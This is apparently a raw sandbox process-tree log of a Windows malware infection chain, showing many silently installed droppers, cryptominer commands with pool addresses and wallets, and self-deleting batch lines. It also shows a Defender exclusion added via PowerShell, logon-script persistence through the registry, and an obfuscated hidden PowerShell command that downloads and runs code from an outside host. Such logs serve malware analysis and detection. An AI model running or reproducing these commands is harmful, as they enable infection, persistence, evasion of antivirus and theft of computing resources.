C:\Users\Admin\AppData\Local\Temp\got2hfqs.out\app.exeC:\Users\Admin\AppData\Local\Temp\got2hfqs.out\app.exe /8-222216⤵PID:14328
-
C:\Users\Admin\AppData\Local\Temp\got2hfqs.out\app.exe"C:\Users\Admin\AppData\Local\Temp\got2hfqs.out\app.exe" /8-222217⤵PID:11944
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ecvpejny.mxx\file.exe & exit15⤵PID:14524
-
C:\Users\Admin\AppData\Local\Temp\ecvpejny.mxx\file.exeC:\Users\Admin\AppData\Local\Temp\ecvpejny.mxx\file.exe16⤵PID:15316
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵PID:9044
-
C:\Users\Admin\AppData\Local\Temp\SFRXZDZTAJ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SFRXZDZTAJ\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:16168
-
C:\Users\Admin\AppData\Local\Temp\SFRXZDZTAJ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SFRXZDZTAJ\multitimer.exe" 1 3.1617432546.60680fe2bb3c7 10119⤵PID:6380
-
C:\Users\Admin\AppData\Local\Temp\SFRXZDZTAJ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SFRXZDZTAJ\multitimer.exe" 2 3.1617432546.60680fe2bb3c720⤵PID:7744
-
C:\Users\Admin\AppData\Local\Temp\w4lwgizokpg\vict.exe"C:\Users\Admin\AppData\Local\Temp\w4lwgizokpg\vict.exe" /VERYSILENT /id=53521⤵PID:7808
-
C:\Users\Admin\AppData\Local\Temp\is-4BJ3J.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-4BJ3J.tmp\vict.tmp" /SL5="$206DE,870426,780800,C:\Users\Admin\AppData\Local\Temp\w4lwgizokpg\vict.exe" /VERYSILENT /id=53522⤵PID:2808
-
C:\Users\Admin\AppData\Local\Temp\is-0VJ5P.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-0VJ5P.tmp\win1host.exe" 53523⤵PID:8576
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yxctyifbiy4\pa1ep1wnura.exe"C:\Users\Admin\AppData\Local\Temp\yxctyifbiy4\pa1ep1wnura.exe" /ustwo INSTALL21⤵PID:7240
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "pa1ep1wnura.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\yxctyifbiy4\pa1ep1wnura.exe" & exit22⤵PID:5104
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "pa1ep1wnura.exe" /f23⤵
- Kills process with taskkill
PID:11228
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\itdmv1upwhw\app.exe"C:\Users\Admin\AppData\Local\Temp\itdmv1upwhw\app.exe" /8-2321⤵PID:4676
-
-
C:\Users\Admin\AppData\Local\Temp\1aw2enevxdz\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\1aw2enevxdz\Setup3310.exe" /Verysilent /subid=57721⤵PID:7864
-
C:\Users\Admin\AppData\Local\Temp\is-HI1FJ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-HI1FJ.tmp\Setup3310.tmp" /SL5="$B031C,138429,56832,C:\Users\Admin\AppData\Local\Temp\1aw2enevxdz\Setup3310.exe" /Verysilent /subid=57722⤵PID:7312
-
C:\Users\Admin\AppData\Local\Temp\is-5KGJ0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5KGJ0.tmp\Setup.exe" /Verysilent23⤵PID:8068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uj1o2b3h0z0\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\uj1o2b3h0z0\cpyrix.exe" /VERYSILENT21⤵PID:7308
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵PID:8676
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵PID:8768
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\CS5NTPTRWS\setups.exe"C:\Users\Admin\AppData\Local\Temp\CS5NTPTRWS\setups.exe" ll18⤵PID:12728
-
C:\Users\Admin\AppData\Local\Temp\is-RHG2L.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-RHG2L.tmp\setups.tmp" /SL5="$7048A,635399,250368,C:\Users\Admin\AppData\Local\Temp\CS5NTPTRWS\setups.exe" ll19⤵PID:12640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"17⤵PID:12660
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"17⤵PID:12828
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:14548
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵PID:16224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"17⤵PID:14612
-
C:\Users\Admin\AppData\Roaming\7472.tmp.exe"C:\Users\Admin\AppData\Roaming\7472.tmp.exe"18⤵PID:8072
-
C:\Users\Admin\AppData\Roaming\7472.tmp.exe"C:\Users\Admin\AppData\Roaming\7472.tmp.exe"19⤵PID:4368
-
-
-
C:\Users\Admin\AppData\Roaming\8933.tmp.exe"C:\Users\Admin\AppData\Roaming\8933.tmp.exe"18⤵PID:3672
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:8848
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵PID:16364
-
-
-
C:\Users\Admin\AppData\Roaming\9346.tmp.exe"C:\Users\Admin\AppData\Roaming\9346.tmp.exe"18⤵PID:8996
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"18⤵PID:4504
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:10108
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"17⤵PID:9748
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r1sktnsn.tth\Four.exe & exit15⤵PID:15020
-
C:\Users\Admin\AppData\Local\Temp\r1sktnsn.tth\Four.exeC:\Users\Admin\AppData\Local\Temp\r1sktnsn.tth\Four.exe16⤵PID:16216
-
C:\Users\Admin\AppData\Local\Temp\X0H7OLGNNI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\X0H7OLGNNI\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:10652
-
C:\Users\Admin\AppData\Local\Temp\X0H7OLGNNI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\X0H7OLGNNI\multitimer.exe" 1 3.1617432539.60680fdb1f9d5 10418⤵PID:15228
-
C:\Users\Admin\AppData\Local\Temp\X0H7OLGNNI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\X0H7OLGNNI\multitimer.exe" 2 3.1617432539.60680fdb1f9d519⤵PID:3996
-
C:\Users\Admin\AppData\Local\Temp\msuyovy20nb\app.exe"C:\Users\Admin\AppData\Local\Temp\msuyovy20nb\app.exe" /8-2320⤵PID:8368
-
-
C:\Users\Admin\AppData\Local\Temp\yuw4yimf0ig\2h40geyuydq.exe"C:\Users\Admin\AppData\Local\Temp\yuw4yimf0ig\2h40geyuydq.exe" /ustwo INSTALL20⤵PID:14840
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "2h40geyuydq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\yuw4yimf0ig\2h40geyuydq.exe" & exit21⤵PID:604
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "2h40geyuydq.exe" /f22⤵
- Kills process with taskkill
PID:16212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\e3rz42o4pxh\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\e3rz42o4pxh\cpyrix.exe" /VERYSILENT20⤵PID:6744
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe21⤵PID:5920
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe21⤵PID:13636
-
-
-
C:\Users\Admin\AppData\Local\Temp\n1gec1quznz\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\n1gec1quznz\Setup3310.exe" /Verysilent /subid=57720⤵PID:8404
-
C:\Users\Admin\AppData\Local\Temp\is-I71KV.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-I71KV.tmp\Setup3310.tmp" /SL5="$206E0,138429,56832,C:\Users\Admin\AppData\Local\Temp\n1gec1quznz\Setup3310.exe" /Verysilent /subid=57721⤵PID:11516
-
C:\Users\Admin\AppData\Local\Temp\is-NKINH.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-NKINH.tmp\Setup.exe" /Verysilent22⤵PID:2124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\evsakovlrue\vict.exe"C:\Users\Admin\AppData\Local\Temp\evsakovlrue\vict.exe" /VERYSILENT /id=53520⤵PID:8420
-
C:\Users\Admin\AppData\Local\Temp\is-7SEIT.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-7SEIT.tmp\vict.tmp" /SL5="$40516,870426,780800,C:\Users\Admin\AppData\Local\Temp\evsakovlrue\vict.exe" /VERYSILENT /id=53521⤵PID:5084
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ZYLTD3FF3B\setups.exe"C:\Users\Admin\AppData\Local\Temp\ZYLTD3FF3B\setups.exe" ll17⤵PID:10832
-
C:\Users\Admin\AppData\Local\Temp\is-NC2DH.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-NC2DH.tmp\setups.tmp" /SL5="$30666,635399,250368,C:\Users\Admin\AppData\Local\Temp\ZYLTD3FF3B\setups.exe" ll18⤵PID:6872
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4936 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:5536
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"11⤵
- Executes dropped EXE
PID:5240 -
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"12⤵PID:8132
-
C:\Users\Admin\Videos\lilal.exe"C:\Users\Admin\Videos\lilal.exe"13⤵PID:10444
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"14⤵PID:12648
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui14⤵PID:13216
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe15⤵PID:13564
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 8132 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"13⤵PID:11456
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 813214⤵
- Kills process with taskkill
PID:12224
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 314⤵PID:13820
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵
- Executes dropped EXE
PID:5100 -
C:\Users\Admin\AppData\Local\Temp\SZPL8V2OQD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SZPL8V2OQD\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4300 -
C:\Users\Admin\AppData\Local\Temp\SZPL8V2OQD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SZPL8V2OQD\multitimer.exe" 1 3.1617432347.60680f1b84e55 10313⤵
- Adds Run key to start application
PID:6908 -
C:\Users\Admin\AppData\Local\Temp\SZPL8V2OQD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SZPL8V2OQD\multitimer.exe" 2 3.1617432347.60680f1b84e5514⤵PID:1556
-
C:\Users\Admin\AppData\Local\Temp\3phrtny3j3g\4kzqwlvcqw4.exe"C:\Users\Admin\AppData\Local\Temp\3phrtny3j3g\4kzqwlvcqw4.exe" /ustwo INSTALL15⤵PID:15712
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "4kzqwlvcqw4.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3phrtny3j3g\4kzqwlvcqw4.exe" & exit16⤵PID:10252
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "4kzqwlvcqw4.exe" /f17⤵
- Kills process with taskkill
PID:10796
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xazqmx1rh3s\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\xazqmx1rh3s\cpyrix.exe" /VERYSILENT15⤵PID:15848
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:9420
-
C:\Users\Admin\AppData\Local\Temp\59987042-5402-4e0e-9889-d03d7130c0c2\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\59987042-5402-4e0e-9889-d03d7130c0c2\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\59987042-5402-4e0e-9889-d03d7130c0c2\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run17⤵PID:11300
-
C:\Users\Admin\AppData\Local\Temp\59987042-5402-4e0e-9889-d03d7130c0c2\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\59987042-5402-4e0e-9889-d03d7130c0c2\AdvancedRun.exe" /SpecialRun 4101d8 1130018⤵PID:13664
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force17⤵PID:14916
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 117⤵PID:15264
-
C:\Windows\SysWOW64\timeout.exetimeout 118⤵
- Delays execution with timeout.exe
PID:16196
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"17⤵PID:3560
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9420 -s 130017⤵
- Program crash
PID:4088
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:9540
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:15828
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\j441zyhykzu\vict.exe"C:\Users\Admin\AppData\Local\Temp\j441zyhykzu\vict.exe" /VERYSILENT /id=53515⤵PID:15916
-
C:\Users\Admin\AppData\Local\Temp\is-QQGVG.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-QQGVG.tmp\vict.tmp" /SL5="$50294,870426,780800,C:\Users\Admin\AppData\Local\Temp\j441zyhykzu\vict.exe" /VERYSILENT /id=53516⤵PID:16136
-
C:\Users\Admin\AppData\Local\Temp\is-8O1CH.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-8O1CH.tmp\win1host.exe" 53517⤵PID:9260
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\r2ky3fuwcv4\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\r2ky3fuwcv4\Setup3310.exe" /Verysilent /subid=57715⤵PID:15928
-
C:\Users\Admin\AppData\Local\Temp\is-VS9Q7.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-VS9Q7.tmp\Setup3310.tmp" /SL5="$3035C,138429,56832,C:\Users\Admin\AppData\Local\Temp\r2ky3fuwcv4\Setup3310.exe" /Verysilent /subid=57716⤵PID:16128
-
C:\Users\Admin\AppData\Local\Temp\is-K037F.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-K037F.tmp\Setup.exe" /Verysilent17⤵PID:9520
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gzf50xqooxc\app.exe"C:\Users\Admin\AppData\Local\Temp\gzf50xqooxc\app.exe" /8-2315⤵PID:6696
-
C:\Users\Admin\AppData\Local\Temp\gzf50xqooxc\app.exe"C:\Users\Admin\AppData\Local\Temp\gzf50xqooxc\app.exe" /8-2316⤵PID:7632
-
-
-
C:\Users\Admin\AppData\Local\Temp\1g1t21mmdin\vpn.exe"C:\Users\Admin\AppData\Local\Temp\1g1t21mmdin\vpn.exe" /silent /subid=48215⤵PID:3912
-
C:\Users\Admin\AppData\Local\Temp\is-E8RA4.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-E8RA4.tmp\vpn.tmp" /SL5="$10552,15170975,270336,C:\Users\Admin\AppData\Local\Temp\1g1t21mmdin\vpn.exe" /silent /subid=48216⤵PID:5668
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Z1UXU28QRD\setups.exe"C:\Users\Admin\AppData\Local\Temp\Z1UXU28QRD\setups.exe" ll12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6112 -
C:\Users\Admin\AppData\Local\Temp\is-T4OTQ.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-T4OTQ.tmp\setups.tmp" /SL5="$4047E,635399,250368,C:\Users\Admin\AppData\Local\Temp\Z1UXU28QRD\setups.exe" ll13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3784
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:6080
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5040 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:936
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4768
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5572 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:2344
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4684
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sty45jmjyyx\frfouitb4n5.exe"C:\Users\Admin\AppData\Local\Temp\sty45jmjyyx\frfouitb4n5.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:5360 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "frfouitb4n5.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\sty45jmjyyx\frfouitb4n5.exe" & exit9⤵PID:4968
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "frfouitb4n5.exe" /f10⤵
- Kills process with taskkill
PID:4788
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fs5fhmpwfqj\vict.exe"C:\Users\Admin\AppData\Local\Temp\fs5fhmpwfqj\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5452 -
C:\Users\Admin\AppData\Local\Temp\is-DCL21.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-DCL21.tmp\vict.tmp" /SL5="$20388,870426,780800,C:\Users\Admin\AppData\Local\Temp\fs5fhmpwfqj\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5512 -
C:\Users\Admin\AppData\Local\Temp\is-DLVJ0.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-DLVJ0.tmp\win1host.exe" 53510⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2512 -
C:\Users\Admin\AppData\Local\Temp\1a8L2Mn3F.exe"C:\Users\Admin\AppData\Local\Temp\1a8L2Mn3F.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4696 -
C:\Users\Admin\AppData\Local\Temp\1a8L2Mn3F.exe"C:\Users\Admin\AppData\Local\Temp\1a8L2Mn3F.exe"12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4812
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:9380
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:9912
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\az2izmkcmoi\vpn.exe"C:\Users\Admin\AppData\Local\Temp\az2izmkcmoi\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5596 -
C:\Users\Admin\AppData\Local\Temp\is-J6B93.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-J6B93.tmp\vpn.tmp" /SL5="$20468,15170975,270336,C:\Users\Admin\AppData\Local\Temp\az2izmkcmoi\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5632 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5456
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:7156
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
- Suspicious use of SetWindowsHookEx
PID:4796
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:7540
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:9112
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ctquufir5dn\lf2lsaeghdu.exe"C:\Users\Admin\AppData\Local\Temp\ctquufir5dn\lf2lsaeghdu.exe" /quiet SILENT=1 AF=7568⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5656 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ctquufir5dn\lf2lsaeghdu.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ctquufir5dn\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617180355 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5496
-
-
-
C:\Users\Admin\AppData\Local\Temp\0zosx5zxdc0\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\0zosx5zxdc0\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5764 -
C:\Users\Admin\AppData\Local\Temp\is-M2ILE.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-M2ILE.tmp\IBInstaller_97039.tmp" /SL5="$304B2,14574851,721408,C:\Users\Admin\AppData\Local\Temp\0zosx5zxdc0\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4736 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-NCU71.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:3936
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-NCU71.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵
- Drops file in Windows directory
PID:5064
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵PID:6548
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6564
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵PID:6596
-
-
C:\Users\Admin\AppData\Local\Temp\is-NCU71.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-NCU71.tmp\{app}\chrome_proxy.exe"10⤵PID:16076
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-NCU71.tmp\{app}\chrome_proxy.exe"11⤵PID:14736
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:4704
-
-
-
-
-
-
